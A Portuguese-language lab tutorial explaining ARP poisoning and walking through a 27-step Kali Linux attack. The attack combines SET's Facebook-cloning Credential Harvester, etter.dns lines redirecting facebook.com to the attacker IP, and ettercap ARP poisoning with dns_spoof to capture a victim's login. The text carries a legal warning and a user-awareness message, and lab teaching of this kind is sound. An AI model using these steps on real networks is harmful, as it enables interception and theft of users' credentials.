O ataque do tipo ARP-Poisoning (ou ARP-Spoofing) é o meio mais eficiente de executar o ataque conhecido por Man-In-The-Middle, que permite que o atacante intercepte informações confidenciais posicionando-se no meio de uma conexão entre duas ou mais máquinas.
A técnica de ARP-Poisoning é aplicada apenas em redes Ethernet. Basicamente, um sistema conectado a um IP ou LAN Ethernet tem dois endereços. O primeiro endereço é o MAC, que é atribuído à placa de rede (NIC1) possuída pelo usuário. Os endereços MAC são (ou supõe-se ser) únicos e utilizando esse endereço o protocolo Ethernet envia os dados. O protocolo Ethernet constrói frames de dados que consistem de blocos de 1500 bytes. Um frame Ethernet consiste do cabeçalho Ethernet, contendo o endereço MAC do computador origem e do computador destino.
*Atenção! Roubo de Informações é CRIME!, leia o artigo sobre a LEI Nº 12.737
Laboratório:
Passo 01
Abra o aplicativo SET através do menu: Applications > Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit
Digite o número 1 Social-Engineering Attacks ( Ataque de Engenharia Social )
Passo 02
Digite o número 2 Website Attack Vectors
Passo 03
Digite o número 3 Credential Harvester Attack Method
Passo 04
Digite o número 2 Site Cloner
Passo 05
Digite o IP do atacante host KALI 10.10.10.130
Passo 06
Digite o endereço do site que deseja clonar no exemplo: www,facebook.com
Passo 07
Toda estrutura esta pronta para visualizar as informações, este terminal deve ficar aberto.
Passo 08
Edite o arquivo etter.dns para adicionar o novo destino da url www.facebook.com
Passo 09
Insira as linhas e salve o arquivo
facebook.com A 10.10.10.130
*.facebook.com A 10.10.10.130
www.facebook.com PTR 10.10.10.130
Passo 10
Certifique-se qual é o Gateway da rede usando o comando route
Passo 11
Abra o aplicativo ettercap através do menu: Applications > Kali Linux > Sniffing/Spoofing > Network Sniffers > ettercap-graphical
Clique em Sniff > Unified sniffing…
Passo 12
Selecione a Interface de Rede> eth0
Passo 13
Clique em Hosts > Scan for hosts
Passo 14
4 Hosts foram encontrados, Clique em Hosts > Hosts list para visualizá-los
Passo 15
Selecione os hosts Gateway ( 10.10.10.2 ) e WIN-7 ( 10.10.10.134 ) e clique em Add to Target 2
Passo 16
Clique em Plugins > Manage the plugins
Passo 17
De um duplo-clique em dns_spoof para ativar o plugin
Passo 18
Clique em Mitm > Arp poisoning…
Passo 19
Selecione a opção Sniff remote conections
Passo 20
O grupo com os hosts é criado
Passo 21
Clique em Start > Start sniffing
Passo 22
O sniffing é iniciado
Passo 23
No host WIN-7 ( 10.10.10.134 ) acesse o site www.facebook.com e informe o e-mail e senha de acesso
Passo 24
Volte a tela do passo 07 e visualize que o usuário e senha são explicitamente exibidos
Passo 25
Ao pressionar as teclas CTRL + C um relatório é gerado no caminho: /root/.set/reports
Passo 26
Para visualizar estes arquivos ative o modo de exibição de arquivos ocultos View > Show Hidden Files
Passo 27
Relatório contendo usuário e senha do site www.facebook.com
MENSAGEM
Tome muito cuidado na hora de realizar o acesso aos seus E-mails, Bancos, Facebook, Twitter, Google+, Instagram pois seus dados podem estar sendo capturados por um criminoso.